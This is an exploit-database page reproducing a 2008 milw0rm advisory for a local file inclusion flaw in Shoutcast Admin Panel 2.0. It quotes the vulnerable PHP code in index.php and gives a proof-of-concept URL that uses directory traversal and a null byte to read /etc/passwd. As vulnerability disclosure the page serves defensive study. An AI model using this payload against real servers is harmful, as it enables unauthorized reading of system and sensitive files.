header-logo
Suggest Exploit
vendor:
WallCity-Server
by:
CWH Underground
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: WallCity-Server
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE: N/A
CPE: a:shoutcastadmin:wallcity-server:2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Shoutcast Admin Panel 2.0 Local File Inclusion Vulnerability

A vulnerability exists in WallCity-Server: Shoutcast Admin Panel 2.0, which allows a remote attacker to include a file from the local system. This can be exploited to disclose sensitive information by including files from the local system, such as the /etc/passwd file. The vulnerability is due to insufficient sanitization of user-supplied input to the 'page' parameter in 'index.php'. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal sequences and a NULL byte (%00) to the vulnerable script. This can be used to include arbitrary files from the local system.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

============================================================
 Shoutcast Admin Panel 2.0 Local File Inclusion Vulnerability
============================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE : 14 June 2008
SITE : www.citec.us


#####################################################
 APPLICATION : WallCity-Server: Shoutcast Admin Panel
 VERSION     : 2.0
 DOWNLOAD    : http://downloads.sourceforge.net/shoutcastadmin
#####################################################

---LFI---

-------------------------
 Vulnerable in index.php
-------------------------

@Line

    79: if (isset($_GET['page']))
    80:         $page = $_GET['page'];
    81: else
    82: 	$page = "main";
    .
    .
    .
   204:  <?PHP if(!include("pages/".$page.".php"))
   205:		{
   206:			table("Achtung!");
   207:			echo "Die Seite existiert nicht!"; 
   208:			closetable();
   209:		}
   210:	 ?>

-------------
 POC Exploit
-------------

[+] http://192.168.24.25/wallcity/index.php?page=../../../../../../etc/passwd%00


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-14]